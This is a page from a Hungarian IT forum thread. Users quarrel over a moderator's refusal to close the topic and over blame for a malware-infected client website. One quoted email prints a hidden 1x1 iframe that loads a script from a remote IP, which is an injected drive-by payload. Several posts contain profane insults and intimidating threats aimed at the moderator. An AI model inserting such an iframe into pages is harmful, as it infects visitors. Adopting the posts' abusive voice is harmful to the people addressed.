HWSW Informatikai Kerekasztal: The Pompous Marsh-hen VII. - HWSW Informatikai Kerekasztal

Ugrás a tartalomhoz

Mellékleteink: HUP | Gamekapocs

• (5208 Oldal)
  • +
  • « Első
  • 5003
  • 5004
  • 5005
  • 5006
  • 5007
  • Utolsó »
  • Nem indíthatsz témát.
  • A téma zárva.

The Pompous Marsh-hen VII. Értékeld a témát: ***-- 15 szavazás

#100081 Felhasználó inaktív   guga 

• Őstag
  • PipaPipaPipaPipaPipa
  • Csoport: Fórumtag

Elküldve: 2016. 09. 16. 15:18

Üzenet megtekintéseIdézet: Jahno - Dátum: 2016. 09. 16. 16:10

Úgy könnyű, de az miért jó? Aztán fél év múlva írsz egy levelet, hogy léccimán?

Fél év múlva halott ember leszek :-D
Most írok, hogy zárd be, vagy basszál ki a gecibe, ha meg nem, kiprovokálom, nem lesz más választásod :cool: :Đ
Csak egy bábú vagy, mint RICH volt, az is pofázott egy darabig, aztán elsüllyedt :Đ
Hány éve is, hogy arcoskodott, s még mindig itt vagyunk?

Zárd be, basszál ki.
Ha más fogja kérni tőled, nem fog tetszeni, türelmes ember vagyok, most még van lehetőséged, nem szeretnélek kényelmetlen helyzetbe hozni, de hidd el megteszem. Ez a topik hamarosan zárva lesz!
Ha nem te, más fogja megtenni.

Tudok olyat írni, tenni, hogy megtörténjen :-D
Rajtad áll, hogy megteszed simán magadtól, vagy nyakonbasz valaki, hogy ezt mi a faszért engedted, ha tudtad előre hülyegyerek :-s

Jobb a lakat előtte, mint a lehordás a sárga földig.

#100082 Felhasználó inaktív   guga 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:25

Üzenet megtekintéseIdézet: Jahno - Dátum: 2016. 09. 16. 16:13

Akkor privát, nem privát, vért kíván. Többit nem találtam meg, de ugye:

"
A következő miatt kereslek:

Jelzést kaptam ma, hogy a fuvolatanoda oldal megnyitásakor a gép vírust jelez. A programozó lány, Judit, aki bütyköli az oldalt, azt mondja, hogy az index forrásában benne volt a következő sor:

<iframe src='http://203.121.78.131/trf/in.cgi?3' width='1' height='1' style='visibility: hidden;'></iframe>
"

Meg persze Cyberéd egyszerű vendégkönyve, mert nem ismerjük a csaptát. Se.

Ergo nem a saját gépünk, hanem a te szervered, amire neked kell felügyelni, s nyilván nem mi basztuk tele vírussal és nem is mi bütyköltük, de próbálkozásnak jó volt :omg:

Lehetne, hogy konkrétumok híjján farkat behúz?
Tudod egyre inkább az az érzésem, hogy te és a többi kibaszott beteg emberek vagytok.
Mármint én soha nem olvasnám s látogatnám olyan hülyék topikját, akikről tényleg azt gondolom, s nem is erőltetném, még ha mögöttem ugyanannyi hülye sorakozik is fel s támasztja alá a véleményem.
ú
Ez beteg dolog, hiába van intelligens és tanult embernek álcázva.
Az egészséges dolog az lenne, hogy erre nem kíváncsi senki, s idejében bezárod, amíg az orrodra nem koppintanak!
Lett szólva.

A késés meg azzal jár, hogy rám fogsz haragudni, amiért nem basztál rá lakatot időben.

#100083 Felhasználó inaktív   JonesC 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:27

Kívülállóként fogalmad sincs róla mit csinálnak az értelmes emberek.
world, my finger, is on the button...
Határozottan egyetértek az enyémmel megegyező véleményekkel!
Éheztesd a fákat! Csökkentsd a co2 kibocsátást!

Idézet

Hi mi name is Paco frome Mexico, please sorry for mi bad inglisco. Mi dead cousine frm america told me how to winned at Lauge of Legan and made me win against bots. My cousin deaded yesterday thogh,but im ok because i sexed his sister. pls no copy pastarino. bye

#100084 Felhasználó inaktív   guga 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:30

Üzenet megtekintéseIdézet: JonesC - Dátum: 2016. 09. 16. 16:27

Értelmes ember nem sablonokhoz nyúl :omg:

#100085 Felhasználó inaktív   Jahno 

• vérképkeretezés occsón
  • PipaPipaPipaPipaPipa
  • Csoport: Stábtag

Elküldve: 2016. 09. 16. 15:31

Üzenet megtekintéseIdézet: guga - Dátum: 2016. 09. 16. 16:25

Ergo nem a saját gépünk, hanem a te szervered, amire neked kell felügyelni, s nyilván nem mi basztuk tele vírussal és nem is mi bütyköltük, de próbálkozásnak jó volt :omg:

Lehetne, hogy konkrétumok híjján farkat behúz?

Ez tökre konkrétum, de ht nahh, izéééé, nem a szerver, hanem tudod, a frissítetlen Wint így lehet tönkretenni, amiről aztán így teszik tönkre a weboldalakat. Direkt nem akarod érteni? Már leírtam azt a varázsszót, hogy exploit.

Aztán volt olyan opció is, hogy a totalcommander FTP eléréseit szedte ki egy dög, mert ugye az összes oldalon egyszerre ment végig. Emlékszel? Azt is biztos a szerveremről lopta és véletlenül sem a gépedről, amin sosem volt vírus.
Make love not Wor.

#100086 Felhasználó inaktív   guga 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:33

Üzenet megtekintéseIdézet: JonesC - Dátum: 2016. 09. 16. 16:27

Hovatovább :-s :-D nekem nem az a dolgom, hogy ping-pong veled és ki nyer ma. Ha bajba kerülsz, mármint olyan bajba, akkor tudom a választ és kötelességem segíteni. De nem kötelességből fogom tenni, szívesen, mert akkor már tényleg bajban leszel.

Úszóversenyzőnek nem szokik mentőövet dobni. Meg kell várni, amíg elfárad és fulldoklik. Nyugika van, sokáig te sem csápolsz.

#100087 Felhasználó inaktív   guga 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:38

Üzenet megtekintéseIdézet: Jahno - Dátum: 2016. 09. 16. 16:31

Ez tökre konkrétum, de ht nahh, izéééé, nem a szerver, hanem tudod, a frissítetlen Wint így lehet tönkretenni, amiről aztán így teszik tönkre a weboldalakat. Direkt nem akarod érteni? Már leírtam azt a varázsszót, hogy exploit.

Aztán volt olyan opció is, hogy a totalcommander FTP eléréseit szedte ki egy dög, mert ugye az összes oldalon egyszerre ment végig. Emlékszel? Azt is biztos a szerveremről lopta és véletlenül sem a gépedről, amin sosem volt vírus.

Az a nejem laptopja, TC sima ügy, de ha a webódal elkészült, utána közünk hozzá :-s
Ha vírus van bármelyik gépünkön, azt észlelem.
Nemvót vírus, vagy ha igen, akkor mikorvótmá :-s meg meddig? Ilyesmi pakliban van, de én kibaszott jó informatikus vagyok, nem úgy mint te, így nem hárítom másra a felelősséget, már ha van felelősség.

Az meg, hogy hülye vagy a saját szerveredhez, ne legyen már az én problémám.
Vagy az hülye, aki bütyköli?
Mert a vevőnek megadtuk az elérést.

Bocs de addig foglak kínosan provokálni, amíg be nem zárod ezt a topikot a faszba. Igénytelen szarrá vált, értelmes embernek erre nincs ingerenciája, csak a selejtes barmoknak tömegbe verődve 54-6-an, mint zsírbá.

#100088 Felhasználó inaktív   Jahno 

• vérképkeretezés occsón
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:40

Üzenet megtekintéseIdézet: guga - Dátum: 2016. 09. 16. 16:38

Bocs de addig foglak kínosan provokálni,

Én me max. értelmesen válaszolok, hogy ne beszélj zöldséget, mert csak magadat égedet. Most jön az elpoénkodós része, szerdán beveszed a gyógyszered, aztán kész.
Make love not Wor.

#100089 Felhasználó inaktív   Jahno 

• vérképkeretezés occsón
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:41

Üzenet megtekintéseIdézet: guga - Dátum: 2016. 09. 16. 16:38

ha a webódal elkészült, utána közünk hozzá :-s
Ha vírus van bármelyik gépünkön, azt észlelem.
Nemvót vírus, vagy ha igen, akkor mikorvótmá :-s meg meddig? Ilyesmi pakliban van,

Annál max annyi, hogy nem hagyunk lukat vagy az ilyet garanciában javítjuk. Tudod, mint a Winnél a frissítések, amit a hülyék direkt nem teszenek fel, így megfertőződik.

Vírus biztos nem volt, el sem vitte a TC jelszavait Véletlenül sem.
Make love not Wor.

#100090 Felhasználó inaktív   JonesC 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:45

Kerületi bajnok voltam asztaliteniszben :)

Azért azt még megvárom, hogy olyan gondom legyen, hogy nélküled ne tudjam megoldani. :)

Idézet

Hi mi name is Paco frome Mexico, please sorry for mi bad inglisco. Mi dead cousine frm america told me how to winned at Lauge of Legan and made me win against bots. My cousin deaded yesterday thogh,but im ok because i sexed his sister. pls no copy pastarino. bye

#100091 Felhasználó inaktív   guga 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:48

Üzenet megtekintéseIdézet: Jahno - Dátum: 2016. 09. 16. 16:41

Annál max annyi, hogy nem hagyunk lukat vagy az ilyet garanciában javítjuk. Tudod, mint a Winnél a frissítések, amit a hülyék direkt nem teszenek fel, így megfertőződik.

Vírus biztos nem volt, el sem vitte a TC jelszavait Véletlenül sem.

Te ezt a topikot addig szeretnéd bezárni, amíg valaki fentről oda nem szól. Adok esélyt, a sárdobálásra, faszságaidra nem vagyok vevő, sem parent directory :-D ellenben addig tedd meg, amíg van rá lehetőséged kattintani.
Ha nem hiszel abban, hogy záróra, akkor feletted fogom kikényszeríteni, mert már kibaszottul unom az aljaskodást, és tenni is fogok ellene. Tevékenyen!

Lehet, most röhejesen hangzik, de ne hozzalak már kínos helyzetbe!
Vagy kikényszeríted?
Nekem tök mindegy, hogyan kerül rá lakat, neked nem lesz mindegy.

#100092 Felhasználó inaktív   guga 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:56

Üzenet megtekintéseIdézet: Jahno - Dátum: 2016. 09. 16. 16:40

Én me max. értelmesen válaszolok, hogy ne beszélj zöldséget, mert csak magadat égedet. Most jön az elpoénkodós része, szerdán beveszed a gyógyszered, aztán kész.

Nem.
Az van, hogy eltökélt szándékom, hogy vagy kitíltsál, vagy lakat a topikra. Fogod a lényeget?
Most még táncolunk, de durvítani fogok, amit vagy te nem fogsz tudni kikerülni, vagy az ostoba fórum tulajdonos, aki eltűri az ilyen petyhüdzt alakokat piros nickkel, akik csak hintáznak.

Ki a faszt érdekel a magánvéleményed, ha vonatkozik rád egy fórumszabályzat:-s zsidózni is kell, hogy lakatot dobj rá, vagy kibasszál a gecibe?
Ugye, hogy kényelmetlen, mert neked és a többi zsírgeci degeneráltnak off a napiu öröme :nevet:

Mondtam, hogy vagy bezárod magadtól és kibaszol innen, vagy rákényszerítelek, csak vagy olyan hülye, hogy ez a mese biztos unikornis :omg:

Addig foglak provokálni, amíg vagy te teszed meg, vagy odabasznak, hogy nem tudod moderálni a rád bízott feladatot :-D

De mivel a fiam dj, élvezheted a finom átmeneteket, ellenben a szar átkeverése kikerülhetetlen. Vagy te teszed meg, vagy addig húzom, hogy velem együtt basznak ki innen.

Egyébként csak, hogy tudd, nekem már nincs sok hátra :cool:

#100093 Felhasználó inaktív   Jahno 

• vérképkeretezés occsón
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:58

Üzenet megtekintéseIdézet: guga - Dátum: 2016. 09. 16. 16:48

Nekem tök mindegy, hogyan kerül rá lakat, neked nem lesz mindegy.

De minek? el vagyunk mi itt, ha nem tetszik, akkor le lehet lépni. Akár külföldre is.
Make love not Wor.

#100094 Felhasználó inaktív   Jahno 

• vérképkeretezés occsón
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 15:59

Üzenet megtekintéseIdézet: guga - Dátum: 2016. 09. 16. 16:56

Nem.
Az van, hogy

Afrikát támogatom, fotós csoportot adminisztrálok, azokhoz képest ez még semmi. Húzd fel magad rendesen.
Make love not Wor.

#100095 Felhasználó inaktív   JonesC 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 16:06

Üzenet megtekintéseIdézet: guga - Dátum: 2016. 09. 16. 16:56

Nem.
Az van, hogy eltökélt szándékom, hogy vagy kitíltsál, vagy lakat a topikra. Fogod a lényeget?
Most még táncolunk, de durvítani fogok, amit vagy te nem fogsz tudni kikerülni, vagy az ostoba fórum tulajdonos, aki eltűri az ilyen petyhüdzt alakokat piros nickkel, akik csak hintáznak.

Ki a faszt érdekel a magánvéleményed, ha vonatkozik rád egy fórumszabályzat:-s zsidózni is kell, hogy lakatot dobj rá, vagy kibasszál a gecibe?
Ugye, hogy kényelmetlen, mert neked és a többi zsírgeci degeneráltnak off a napiu öröme :nevet:

Mondtam, hogy vagy bezárod magadtól és kibaszol innen, vagy rákényszerítelek, csak vagy olyan hülye, hogy ez a mese biztos unikornis :omg:

Addig foglak provokálni, amíg vagy te teszed meg, vagy odabasznak, hogy nem tudod moderálni a rád bízott feladatot :-D

De mivel a fiam dj, élvezheted a finom átmeneteket, ellenben a szar átkeverése kikerülhetetlen. Vagy te teszed meg, vagy addig húzom, hogy velem együtt basznak ki innen.

Egyébként csak, hogy tudd, nekem már nincs sok hátra :cool:

Youtube-odat se zárták le, pedig ott is elcsattant néhány vastag zsidózás.

Idézet

#100096 Felhasználó inaktív   JonesC 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 16:08

Amúgy ha elég volt az aljaskodás, miért nem hagyod abba guga?

Idézet

#100097 Felhasználó inaktív   NauTiLUS 

• Senior tag
  • PipaPipaPipaPipa

Elküldve: 2016. 09. 16. 16:14

Üzenet megtekintéseIdézet: guga - Dátum: 2016. 09. 16. 14:57

Köztünk a különbség annyi, hogy én már lélekben felkészültem, s megtanultam az életben maradást erdőn, mezőn, vadak elejtésével, vagy éppen csöndes háziállatok tartásával, mint nyulak. De ehető növények, stb.

Engem nem fog megzavarni, ha a boltok bezárnak.
Ez számodra lesz újdonság :nevet: mármint hogy a szorgalmas MÉH módjára összehordott mézedet elveszik, s nem kapsz semmit :Đ

Guga, már bocs de 7 lovam, 10+ nyulam, 2 kecském és sertéseim voltak egy időben. A feleségem állatorvos, gondolod tudsz újat mondani, ne nevetess már. Bár a legjobb, hogy most ugyanott vagyunk, a nagy lelki felkészülésedet leszámítva.

#100098 Felhasználó inaktív   Csula kapitány 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 16:18

guga, ő máshol nehezményezte: https://forum.hwsw.h...s/page__st__840

Idézet

A materialista hitűek számára értelmezhetetlen a galaktikus geometria változásával vezérelt ciklikusságok.

#100099 Felhasználó inaktív   Jahno 

• vérképkeretezés occsón
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 16:25

Ne adjunk már tippeket.
Make love not Wor.

#100100 Felhasználó inaktív   Gabibácsi 

• Őstag
  • PipaPipaPipaPipaPipa

Elküldve: 2016. 09. 16. 16:25

Üzenet megtekintéseIdézet: guga - Dátum: 2016. 09. 16. 15:42

Neked sima ügy lett volna, hogy semmi közöm hozzá :omg:
De, ha el kell magyarázni, ne gyere már velem kínaiba mosogatni.
Annyi még nekem is ment volna, hogy honnan ír. De, ahogy a többi fasz nem érdekel veled együtt, az, hogy Ő mit gondol rólatok, rólam, ne legyen már rám testálva. Tipródjon rajta zsírbá, meg akit zavar :omg:

Amúgy mi történt, kidobott az asszony?
--- Internet is just a bigger floppy disk ---

Téma megosztása:

• (5208 Oldal)
  • +
  • « Első
  • 5003
  • 5004
  • 5005
  • 5006
  • 5007
  • Utolsó »